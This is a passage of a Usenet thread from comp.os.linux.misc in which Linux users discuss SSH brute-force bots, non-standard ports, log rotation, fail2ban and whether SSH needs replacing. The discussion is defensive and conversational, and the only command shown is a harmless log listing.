<87mt7mwyvl.fsf@usenet.ankman.de> <op.1xa671jca3w0dxdave@hodgins.homeip.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
X-Trace: individual.net d7KUopHNzxnHUpp1tZDduAjHfySlkShPIaR84StFPs3aMxBVSw
Cancel-Lock: sha1:Vj3slytQpg3StCsaCpyqhcenQJg=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Thunderbird/102.5.1
Content-Language: es-ES, en-CA
In-Reply-To: <op.1xa671jca3w0dxdave@hodgins.homeip.net>
 by: Carlos E. R. - Sat, 17 Dec 2022 11:41 UTC

On 17/12/2022 08.03, David W. Hodgins wrote:
> On Fri, 16 Dec 2022 21:24:46 -0500, Andreas Kohlbach <ank@spamfence.net>
> wrote:
>
>> On Fri, 16 Dec 2022 10:30:17 +0100, Carlos E. R. wrote:
>>>
>>> On 16/12/2022 10.20, The Natural Philosopher wrote:
>>>
>>>> I've had open SSH for years on backbone hosted kit. everybody tries
>>>> to login as root.
>>>> I let them. Root is not allowed to log in.
>>>
>>> One idea would be to automatically block the IPs that try to login as
>>> root or other typical names used by bots.
>>
>> Nah, don't. Have them have their fun. They don't know root won't get in
>> and waste their own resources. Although today it won't matter either. But
>> not letting them know they cannot login as root they keep trying instead
>> of wandering off and try other servers where they might be successful.

They fill the logs.

>>
>>> That's something a human operator would do.
>>
>> I don't think so. Unless being DDoSed. But then you have to take a
>> completely different approach to mitigate the traffic.
>
> I don't block, but I use a non-standard port. Otherwise failed attempts
> can fill the filesystem where the logs are stored. I had that happen before
> I switched ports.

Yes, that's what I do. Works wonderfully, not a hit in months.

>
> Regards, Dave Hodgins

--
Cheers,
Carlos E.R.

Re: Is It Time To Replace SSH ???

<k05oagF35vsU2@mid.individual.net>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10979&group=comp.os.linux.misc#10979

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!usenet.goja.nl.eu.org!3.eu.feeder.erje.net!feeder.erje.net!fu-berlin.de!uni-berlin.de!individual.net!not-for-mail
From: robin_listas@es.invalid (Carlos E. R.)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sat, 17 Dec 2022 12:43:12 +0100
Lines: 39
Message-ID: <k05oagF35vsU2@mid.individual.net>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>
<tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net>
<87mt7mwyvl.fsf@usenet.ankman.de> <op.1xa671jca3w0dxdave@hodgins.homeip.net>
<871qoywh67.fsf@usenet.ankman.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
X-Trace: individual.net OxNyy4thKEeAKcIhQgF2agw+Em8ad1xJ5tUiiH44GhsZUhkRAU
Cancel-Lock: sha1:uc6HXJy+oEmSJ2cpenoSzKR/QJs=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Thunderbird/102.5.1
Content-Language: es-ES, en-CA
In-Reply-To: <871qoywh67.fsf@usenet.ankman.de>
 by: Carlos E. R. - Sat, 17 Dec 2022 11:43 UTC

On 17/12/2022 09.47, Andreas Kohlbach wrote:
> On Sat, 17 Dec 2022 02:03:27 -0500, David W. Hodgins wrote:
>>
>> On Fri, 16 Dec 2022 21:24:46 -0500, Andreas Kohlbach <ank@spamfence.net> wrote:
>>
>>> On Fri, 16 Dec 2022 10:30:17 +0100, Carlos E. R. wrote:
>>>>
>>> Nah, don't. Have them have their fun. They don't know root won't get in
>>> and waste their own resources. Although today it won't matter either. But
>>> not letting them know they cannot login as root they keep trying instead
>>> of wandering off and try other servers where they might be successful.
>>>
>>>> That's something a human operator would do.
>>>
>>> I don't think so. Unless being DDoSed. But then you have to take a
>>> completely different approach to mitigate the traffic.
>>
>> I don't block, but I use a non-standard port. Otherwise failed attempts
>> can fill the filesystem where the logs are stored. I had that happen before
>> I switched ports.
>
> There's logrotate to take care of logfile sizes.

That's not the issue.

The issue is so much noise that something important will be missed.

>
> ~$ ls -lrt /var/log/auth*
> -rw-r----- 1 root adm 78358 Nov 19 23:39 /var/log/auth.log.4.gz
> -rw-r----- 1 root adm 83875 Nov 26 23:57 /var/log/auth.log.3.gz
> -rw-r----- 1 root adm 44726 Dec 3 23:46 /var/log/auth.log.2.gz
> -rw-r----- 1 root adm 449644 Dec 10 23:51 /var/log/auth.log.1
> -rw-r----- 1 root adm 987377 Dec 17 03:45 /var/log/auth.log

--
Cheers,
Carlos E.R.

Re: Is It Time To Replace SSH ???

<EDOdnU4lN668IAD-nZ2dnZfqnPidnZ2d@giganews.com>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10980&group=comp.os.linux.misc#10980

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!usenet.blueworldhosting.com!feed1.usenet.blueworldhosting.com!peer01.iad!feed-me.highwinds-media.com!news.highwinds-media.com!feeder.usenetexpress.com!tr1.iad1.usenetexpress.com!69.80.99.22.MISMATCH!Xl.tags.giganews.com!local-2.nntp.ord.giganews.com!news.giganews.com.POSTED!not-for-mail
NNTP-Posting-Date: Sat, 17 Dec 2022 12:59:13 +0000
MIME-Version: 1.0
From: heller@deepsoft.com (Robert Heller)
Organization: Deepwoods Software
X-Newsreader: TkNews 3.0 (1.2.15)
Subject: Re: Is It Time To Replace SSH ???
In-Reply-To: <6sScnWpDiqXc7QD-nZ2dnZfqnPGdnZ2d@earthlink.com>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>? <tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>? <tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net>? <tnhea9$3bglv$10@dont-email.me> <wwvbko3jj7p.fsf@LkoBDZeT.terraraq.uk>? <tnilb0$1qdhe$1@news1.tnib.de> <6sScnWpDiqXc7QD-nZ2dnZfqnPGdnZ2d@earthlink.com>
Newsgroups: comp.os.linux.misc
Content-Type: text/plain; charset="us-ascii"
Originator: heller@sharky4.deepsoft.com
Message-ID: <EDOdnU4lN668IAD-nZ2dnZfqnPidnZ2d@giganews.com>
Date: Sat, 17 Dec 2022 12:59:13 +0000
Lines: 83
X-Usenet-Provider: http://www.giganews.com
X-Trace: sv3-IOTQHuOCDVYtGvSQoF9+KrCcGmYKG+Xyd6pLf90gnsjbElQd4d5PbHQGFdcj3CJUI2e7jZgxyFZD/qY!kn1cqPmhmAVaZksVL8OOHvuCdL01+D9kDr/kuUKFSJhs2wUpRwQB4xNVO35Ts71d0VZWkGGjZSsR!j6Y=
X-Complaints-To: abuse@giganews.com
X-DMCA-Notifications: http://www.giganews.com/info/dmca.html
X-Abuse-and-DMCA-Info: Please be sure to forward a copy of ALL headers
X-Abuse-and-DMCA-Info: Otherwise we will be unable to process your complaint properly
X-Postfilter: 1.3.40
X-Received-Bytes: 5168
 by: Robert Heller - Sat, 17 Dec 2022 12:59 UTC

At Sat, 17 Dec 2022 02:31:12 -0500 "26C.Z969" <26C.Z969@noaada.net> wrote:

>
> On 12/16/22 3:44 PM, Marc Haber wrote:
> > Richard Kettlewell <invalid@invalid.invalid> wrote:
> >> The Natural Philosopher <tnp@invalid.invalid> writes:
> >>> On 16/12/2022 09:30, Carlos E. R. wrote:
> >>>> One idea would be to automatically block the IPs that try to login
> >>>> as root or other typical names used by bots.
> >>>> That's something a human operator would do.
> >>>>
> >>> Why bother? they would then go on to bother someone else, possibly
> >>> with less bandwidth than I.
> >>>
> >>> If they want to spend an hour trying every single password in their
> >>> dictionary, its no skin off my nose.
> >>
> >> I’ve got better uses for my CPU[1] than key agreement with low-rent
> >> attackers, and better uses for my logs than background error noise.
> >
> > It's matter of style, both ways to do it have their advantages and
> > their disadvantages. It's nothing to get missionary over.
>
> Strictly "human" attackers are pretty much a historical
> artifact at this point - unless you're a bank or govt
> letter agency or some similar high-profile/high-return
> target. For the rest of the world it's all BOTS - busy
> busy little bots. They WILL try every password in their
> book and then start on the random shit. They will come
> at you from a hundred, a thousand, ten thousand IP
> ripped-off addresses. They will keep at it for days,
> months. Just one of a thousand little bot processes
> running on a few boxes in Romania or Russia that link
> through "friendly"-looking address ranges (DigitalOcean
> seems to be the most popular route, the Netherlands
> seems to be THE path Russians use to APPEAR to be
> "EU").
>
> Been there, see it.
>
> SSH isn't "smart" enough to see what a human can
> plainly see - an attack. We need some "AI" sort
> of adjunct at this point.
>
> Yea, there ARE other tricks - narrow the IP range that
> the firewall will even let GET at yer SSH port - but
> that's not a solution for all.
>
> A smarter SSH, one intentionally designed for this
> bot-ridden world, is needed.

Not really, a program that analyses SSH's log file can do that. Oh, wait, it
already exists: fail2ban. Hmm... Maybe just a smarter fail2ban?

>
> The OTHER, growing, part of the security equation
> isn't "hacking" anymore - even by bots - but
> "human factors". Idiots in the company or even
> spies planted as interns, looking over shoulders.
>
> The favorite ploy the past few months has been
> fake invoices - seemingly from respectable corps,
> maybe even ones you do biz with. The link to the
> detailed invoice will be bad - so you'll wanna
> click the "help" link. SOME are obvious ploys,
> others are pretty damned good ... might have to
> dissect the source/html to spot the fraud. Few
> smaller outfits have people who can DO that and
> big "computer service providers" are, well, they
> collect money and then never DO much. Even they
> don't have the people-power or interest to cope.
> SOMEWHERE in the service agreement you signed
> your rights away ..........
>
>
>

--
Robert Heller -- Cell: 413-658-7953 GV: 978-633-5364
Deepwoods Software -- Custom Software Services
http://www.deepsoft.com/ -- Linux Administration Services
heller@deepsoft.com -- Webhosting Services

Re: Is It Time To Replace SSH ???

<tnkj8k$3lupf$2@dont-email.me>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10981&group=comp.os.linux.misc#10981

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!eternal-september.org!reader01.eternal-september.org!.POSTED!not-for-mail
From: rich@example.invalid (Rich)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sat, 17 Dec 2022 14:21:08 -0000 (UTC)
Organization: A noiseless patient Spider
Lines: 22
Message-ID: <tnkj8k$3lupf$2@dont-email.me>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com> <tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de> <-_-dnbdq0bqGnwH-nZ2dnZfqnPednZ2d@earthlink.com> <87sfhfx3gz.fsf@usenet.ankman.de> <6KycnZ4e4cec9gD-nZ2dnZfqnPudnZ2d@earthlink.com>
Injection-Date: Sat, 17 Dec 2022 14:21:08 -0000 (UTC)
Injection-Info: reader01.eternal-september.org; posting-host="6912ce45860a03cd2d5f38b3c09f6947";
logging-data="3865391"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX1/OqcNbBqTRAcHIo2+3T9q0"
User-Agent: tin/2.0.1-20111224 ("Achenvoir") (UNIX) (Linux/3.10.17 (x86_64))
Cancel-Lock: sha1:QI6w9FVpbj8EcQpfrGmLOwn3+64=
 by: Rich - Sat, 17 Dec 2022 14:21 UTC

26C.Z969 <26C.Z969@noaada.net> wrote:
> Not so long ago, I was working on the weekend and watched one of
> these attacks take shape. First it was one IP address showing up
> in the firewall logs. Did a simple conservative /24 block on it.
> Half an hour later MORE probes showed up - first from a few
> addresses, then dozens, then hundreds banging at it as fast as they
> could. Even looking at the detailed connection info revealed no
> common factors you could filter. Dunno if this was one bot or the
> "hot" address was shared around. So, as I was pretty much the only
> one using it (and it was NOT p22 - never use that !) I just changed
> the external port number. However for TEN MONTHS there were
> literally a thousand+ probes a day on that old, dead, port.
>
> This is where I concluded that SSH was not fit for the modern
> world. It's not "smart" enough.

Please enlighten us then as to how your proposed "replacement", given
the same situation as you detail above, was to be somehow 'smarter'
and be able to control the actions of actors elsewhere on the internet.

What would this 'smarter' replacement do, given what happened "not so
long ago"?

Re: Is It Time To Replace SSH ???

<tnkjgv$3lupf$3@dont-email.me>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10982&group=comp.os.linux.misc#10982

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!eternal-september.org!reader01.eternal-september.org!.POSTED!not-for-mail
From: rich@example.invalid (Rich)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sat, 17 Dec 2022 14:25:35 -0000 (UTC)
Organization: A noiseless patient Spider
Lines: 33
Message-ID: <tnkjgv$3lupf$3@dont-email.me>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com> <tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de> <tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net> <tnhea9$3bglv$10@dont-email.me> <wwvbko3jj7p.fsf@LkoBDZeT.terraraq.uk> <tnilb0$1qdhe$1@news1.tnib.de> <6sScnWpDiqXc7QD-nZ2dnZfqnPGdnZ2d@earthlink.com>
Injection-Date: Sat, 17 Dec 2022 14:25:35 -0000 (UTC)
Injection-Info: reader01.eternal-september.org; posting-host="6912ce45860a03cd2d5f38b3c09f6947";
logging-data="3865391"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX19b6VxvF+THEO74OiFnMKPk"
User-Agent: tin/2.0.1-20111224 ("Achenvoir") (UNIX) (Linux/3.10.17 (x86_64))
Cancel-Lock: sha1:bFSRqN8/ipx+xtEES3fUTguV+cI=
 by: Rich - Sat, 17 Dec 2022 14:25 UTC

26C.Z969 <26C.Z969@noaada.net> wrote:
> Strictly "human" attackers are pretty much a historical artifact at
> this point - unless you're a bank or govt letter agency or some
> similar high-profile/high-return target. For the rest of the world
> it's all BOTS - busy busy little bots. They WILL try every
> password in their book and then start on the random shit. They
> will come at you from a hundred, a thousand, ten thousand IP
> ripped-off addresses. They will keep at it for days, months. Just
> one of a thousand little bot processes running on a few boxes in
> Romania or Russia that link through "friendly"-looking address
> ranges (DigitalOcean seems to be the most popular route, the
> Netherlands seems to be THE path Russians use to APPEAR to be
> "EU").
>
> Been there, see it.
>
> SSH isn't "smart" enough to see what a human can plainly see - an
> attack. We need some "AI" sort of adjunct at this point.

Please detail what your proposed 'smarter' ssh would do given this
situation.

And, while you are at it, please explain why this should be an activity
that ssh concerns itself with (thereby adding significant complexity)
as opposed to this being a network monitoring layer, separate from ssh,
that monitors and remediates things on behalf of ssh and any other
services.

> A smarter SSH, one intentionally designed for this
> bot-ridden world, is needed.

Please explain what additional activities your new-ssh would perform,
given the situation you have described above.

Re: Is It Time To Replace SSH ???

<op.1xbuojdxa3w0dxdave@hodgins.homeip.net>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10983&group=comp.os.linux.misc#10983

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!eternal-september.org!reader01.eternal-september.org!.POSTED!not-for-mail
From: dwhodgins@nomail.afraid.org (David W. Hodgins)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sat, 17 Dec 2022 10:30:09 -0500
Organization: A noiseless patient Spider
Lines: 40
Message-ID: <op.1xbuojdxa3w0dxdave@hodgins.homeip.net>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>
<tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net>
<87mt7mwyvl.fsf@usenet.ankman.de> <op.1xa671jca3w0dxdave@hodgins.homeip.net>
<871qoywh67.fsf@usenet.ankman.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8; format=flowed; delsp=yes
Content-Transfer-Encoding: 8bit
Injection-Info: reader01.eternal-september.org; posting-host="a277d08b3086472d382676c845e440cd";
logging-data="3878976"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX1+Q0RcWX+2D/a7SJbNDMYfJWxQwSOSXSF4="
User-Agent: Opera Mail/12.16 (Linux)
Cancel-Lock: sha1:Smh8e81YJuNV7lUlVkeJnV8XRLU=
 by: David W. Hodgins - Sat, 17 Dec 2022 15:30 UTC

On Sat, 17 Dec 2022 03:47:12 -0500, Andreas Kohlbach <ank@spamfence.net> wrote:

> On Sat, 17 Dec 2022 02:03:27 -0500, David W. Hodgins wrote:
>>
>> On Fri, 16 Dec 2022 21:24:46 -0500, Andreas Kohlbach <ank@spamfence.net> wrote:
>>
>>> On Fri, 16 Dec 2022 10:30:17 +0100, Carlos E. R. wrote:
>>>>
>>> Nah, don't. Have them have their fun. They don't know root won't get in
>>> and waste their own resources. Although today it won't matter either. But
>>> not letting them know they cannot login as root they keep trying instead
>>> of wandering off and try other servers where they might be successful.
>>>
>>>> That's something a human operator would do.
>>>
>>> I don't think so. Unless being DDoSed. But then you have to take a
>>> completely different approach to mitigate the traffic.
>>
>> I don't block, but I use a non-standard port. Otherwise failed attempts
>> can fill the filesystem where the logs are stored. I had that happen before
>> I switched ports.
>
> There's logrotate to take care of logfile sizes.
>
> ~$ ls -lrt /var/log/auth*
> -rw-r----- 1 root adm 78358 Nov 19 23:39 /var/log/auth.log.4.gz
> -rw-r----- 1 root adm 83875 Nov 26 23:57 /var/log/auth.log.3.gz
> -rw-r----- 1 root adm 44726 Dec 3 23:46 /var/log/auth.log.2.gz
> -rw-r----- 1 root adm 449644 Dec 10 23:51 /var/log/auth.log.1
> -rw-r----- 1 root adm 987377 Dec 17 03:45 /var/log/auth.log

When you get a few dozen hits per minute, it doesn't take a week to use a lot
of log space. Rotating more often will mean info will be removed sooner too.

Granted, disk drive space has come down in price a lot since I ran into the
issue and switched to using a custom port, but there are also new systems
such as raspberry pi, that normally run from an sd card, which limits the
drive size.

Regards, Dave Hodgins

Re: Is It Time To Replace SSH ???

<k07306F9603U1@mid.individual.net>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10985&group=comp.os.linux.misc#10985

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!aioe.org!news.mb-net.net!open-news-network.org!news.mind.de!bolzen.all.de!fu-berlin.de!uni-berlin.de!individual.net!not-for-mail
From: robin_listas@es.invalid (Carlos E. R.)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sun, 18 Dec 2022 00:51:34 +0100
Lines: 42
Message-ID: <k07306F9603U1@mid.individual.net>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>
<tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net>
<tnhea9$3bglv$10@dont-email.me> <wwvbko3jj7p.fsf@LkoBDZeT.terraraq.uk>
<tnilb0$1qdhe$1@news1.tnib.de>
<6sScnWpDiqXc7QD-nZ2dnZfqnPGdnZ2d@earthlink.com>
<tnkjgv$3lupf$3@dont-email.me>
Mime-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
X-Trace: individual.net J0N/mFIxtTotxhWrH+s3CAHsMHxWdgy4HhSHM/oVRLq9+Uf1Y4
Cancel-Lock: sha1:t3B8S1OaOMF8JuglCRpMQE6ATBs=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Thunderbird/102.5.1
Content-Language: es-ES, en-CA
In-Reply-To: <tnkjgv$3lupf$3@dont-email.me>
 by: Carlos E. R. - Sat, 17 Dec 2022 23:51 UTC

On 17/12/2022 15.25, Rich wrote:
> 26C.Z969 <26C.Z969@noaada.net> wrote:
>> Strictly "human" attackers are pretty much a historical artifact at
>> this point - unless you're a bank or govt letter agency or some
>> similar high-profile/high-return target. For the rest of the world
>> it's all BOTS - busy busy little bots. They WILL try every
>> password in their book and then start on the random shit. They
>> will come at you from a hundred, a thousand, ten thousand IP
>> ripped-off addresses. They will keep at it for days, months. Just
>> one of a thousand little bot processes running on a few boxes in
>> Romania or Russia that link through "friendly"-looking address
>> ranges (DigitalOcean seems to be the most popular route, the
>> Netherlands seems to be THE path Russians use to APPEAR to be
>> "EU").
>>
>> Been there, see it.
>>
>> SSH isn't "smart" enough to see what a human can plainly see - an
>> attack. We need some "AI" sort of adjunct at this point.
>
> Please detail what your proposed 'smarter' ssh would do given this
> situation.
>
> And, while you are at it, please explain why this should be an activity
> that ssh concerns itself with (thereby adding significant complexity)
> as opposed to this being a network monitoring layer, separate from ssh,
> that monitors and remediates things on behalf of ssh and any other
> services.

Monitoring logs is a kludge.

>
>> A smarter SSH, one intentionally designed for this
>> bot-ridden world, is needed.
>
> Please explain what additional activities your new-ssh would perform,
> given the situation you have described above.

--
Cheers,
Carlos E.R.

Re: Is It Time To Replace SSH ???

<875ye9v7ho.fsf@usenet.ankman.de>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10987&group=comp.os.linux.misc#10987

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!eternal-september.org!reader01.eternal-september.org!.POSTED!not-for-mail
From: ank@spamfence.net (Andreas Kohlbach)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sat, 17 Dec 2022 20:13:55 -0500
Organization: A noiseless patient Spider
Lines: 20
Message-ID: <875ye9v7ho.fsf@usenet.ankman.de>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>
<tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net>
<87mt7mwyvl.fsf@usenet.ankman.de>
<op.1xa671jca3w0dxdave@hodgins.homeip.net>
<871qoywh67.fsf@usenet.ankman.de> <k05oagF35vsU2@mid.individual.net>
MIME-Version: 1.0
Content-Type: text/plain
Injection-Info: reader01.eternal-september.org; posting-host="45386fd9d7eacbad561ae8a38bbae0d9";
logging-data="3993081"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX19p/xr3J1RxhlJ7rZXcPhfd"
User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/27.1 (gnu/linux)
Cancel-Lock: sha1:CCezGeWgXi4B6EAb1vdEO3MthXc=
sha1:WInv3klm9OADcPB45ejLFLhicYE=
X-No-Archive: Yes
 by: Andreas Kohlbach - Sun, 18 Dec 2022 01:13 UTC

On Sat, 17 Dec 2022 12:43:12 +0100, Carlos E. R. wrote:
>
> On 17/12/2022 09.47, Andreas Kohlbach wrote:
>> On Sat, 17 Dec 2022 02:03:27 -0500, David W. Hodgins wrote:
>>>
>>>> I don't think so. Unless being DDoSed. But then you have to take a
>>>> completely different approach to mitigate the traffic.
>>>
>>> I don't block, but I use a non-standard port. Otherwise failed attempts
>>> can fill the filesystem where the logs are stored. I had that happen before
>>> I switched ports.
>> There's logrotate to take care of logfile sizes.
>
> That's not the issue.
>
> The issue is so much noise that something important will be missed.

I was referring to "can fill the filesystem".
--
Andreas

Re: Is It Time To Replace SSH ???

<87359dv76e.fsf@usenet.ankman.de>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10988&group=comp.os.linux.misc#10988

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!eternal-september.org!reader01.eternal-september.org!.POSTED!not-for-mail
From: ank@spamfence.net (Andreas Kohlbach)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sat, 17 Dec 2022 20:20:41 -0500
Organization: A noiseless patient Spider
Lines: 42
Message-ID: <87359dv76e.fsf@usenet.ankman.de>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>
<tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net>
<87mt7mwyvl.fsf@usenet.ankman.de>
<op.1xa671jca3w0dxdave@hodgins.homeip.net>
<871qoywh67.fsf@usenet.ankman.de>
<op.1xbuojdxa3w0dxdave@hodgins.homeip.net>
MIME-Version: 1.0
Content-Type: text/plain
Injection-Info: reader01.eternal-september.org; posting-host="45386fd9d7eacbad561ae8a38bbae0d9";
logging-data="3993081"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX1/6ohKPba43Wy7HNWUdJ3uf"
User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/27.1 (gnu/linux)
Cancel-Lock: sha1:ePCKx9LbbYQ+4pg1tsAfba4nPhk=
sha1:E5mKPxURRPHXnNKCC0mKY62kBWM=
X-No-Archive: Yes
 by: Andreas Kohlbach - Sun, 18 Dec 2022 01:20 UTC

On Sat, 17 Dec 2022 10:30:09 -0500, David W. Hodgins wrote:
>
> On Sat, 17 Dec 2022 03:47:12 -0500, Andreas Kohlbach <ank@spamfence.net> wrote:
>
>> On Sat, 17 Dec 2022 02:03:27 -0500, David W. Hodgins wrote:
>>>
>>> I don't block, but I use a non-standard port. Otherwise failed attempts
>>> can fill the filesystem where the logs are stored. I had that happen before
>>> I switched ports.
>>
>> There's logrotate to take care of logfile sizes.
>>
>> ~$ ls -lrt /var/log/auth*
>> -rw-r----- 1 root adm 78358 Nov 19 23:39 /var/log/auth.log.4.gz
>> -rw-r----- 1 root adm 83875 Nov 26 23:57 /var/log/auth.log.3.gz
>> -rw-r----- 1 root adm 44726 Dec 3 23:46 /var/log/auth.log.2.gz
>> -rw-r----- 1 root adm 449644 Dec 10 23:51 /var/log/auth.log.1
>> -rw-r----- 1 root adm 987377 Dec 17 03:45 /var/log/auth.log
>
> When you get a few dozen hits per minute, it doesn't take a week to use a lot
> of log space. Rotating more often will mean info will be removed sooner too.

We (at least not me) not offer commercial services. Thus all there is
noise we need not to look into, unless fear we've been hacked. Thus space
will not clog up unless you have not much disk space anyway. Thus default
setting (compress once a week or so) is fine for most of us.

> Granted, disk drive space has come down in price a lot since I ran into the
> issue and switched to using a custom port, but there are also new systems
> such as raspberry pi, that normally run from an sd card, which limits the
> drive size.

As not commercial service i didn't bought a new drive just to log noise.

As mentioned, I have my IP two year now with port 22 open to the
internet. And I *don't* drown in logs, see the excerpt on top.

But of course, feel free to use an other port than 22. That's reduce
noise. But I stick with 22 (I might just forget where I otherwise set it
to) as I have no problem with that since decades.
--
Andreas

Re: Is It Time To Replace SSH ???

<xaSdnffGtOpZ7AP-nZ2dnZfqn_idnZ2d@earthlink.com>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10990&group=comp.os.linux.misc#10990

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!weretis.net!feeder6.news.weretis.net!news.misty.com!border-2.nntp.ord.giganews.com!nntp.giganews.com!Xl.tags.giganews.com!local-1.nntp.ord.giganews.com!nntp.earthlink.com!news.earthlink.com.POSTED!not-for-mail
NNTP-Posting-Date: Sun, 18 Dec 2022 01:49:56 +0000
Subject: Re: Is It Time To Replace SSH ???
Newsgroups: comp.os.linux.misc
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfch7$33uu5$1@dont-email.me>
<dM6cnVBFo_qAYgb-nZ2dnZfqnPGdnZ2d@earthlink.com>
<tnhdk8$3bglv$6@dont-email.me>
From: 26C.Z969@noaada.net (26C.Z969)
Date: Sat, 17 Dec 2022 20:49:52 -0500
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Thunderbird/78.13.0
MIME-Version: 1.0
In-Reply-To: <tnhdk8$3bglv$6@dont-email.me>
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Language: en-US
Content-Transfer-Encoding: 8bit
Message-ID: <xaSdnffGtOpZ7AP-nZ2dnZfqn_idnZ2d@earthlink.com>
Lines: 71
X-Usenet-Provider: http://www.giganews.com
NNTP-Posting-Host: 68.222.41.46
X-Trace: sv3-2IIk1Qof6rAEt5cWw0jogIt3zt5HT0vqXZAm3WcjPVqqGjOB46N7a/lk63XiMnUBNXGeJqGpWIh22/K!00rawe0/6lZf7R5BAXE7+9X3qtGr+cuF298nSWfIzYmhmSj4An7bHzSR7zjTikM4qhoyKvEtpamh!UVzWrAxmWilyhcuA+d4=
X-Abuse-and-DMCA-Info: Please be sure to forward a copy of ALL headers
X-Abuse-and-DMCA-Info: Otherwise we will be unable to process your complaint properly
X-Postfilter: 1.3.40
 by: 26C.Z969 - Sun, 18 Dec 2022 01:49 UTC

On 12/16/22 4:26 AM, The Natural Philosopher wrote:
> On 16/12/2022 05:16, 26C.Z969 wrote:
>> On 12/15/22 9:55 AM, Lew Pitcher wrote:
>>> On Thu, 15 Dec 2022 01:52:41 -0500, 26C.Z969 wrote:
>>>
>>>> SSH is a good oldie for sure. However, it seems to be increasingly
>>>> unfit
>>>> for the modern realities.
>>> [snip]
>>>> I mean REPLACE it entirely with a clean new solution. Too much
>>>> feature-creep on old apps is never a good idea.
>>>
>>> While I don't agree with you (I think that your observed problems
>>> are likely caused more by operator error than aged software), I
>>> have no problems with YOU attempting to replace ssh with something
>>> better. Have at it, my friend.
>>>
>>> Once YOU write a stable and featurefull replacement for ssh, please
>>> let us know.
>>>
>>> Luck be with you
>>
>>    In the end I may HAVE to ... but not my idea
>>    of fun. Replacing SSH really needs to be a
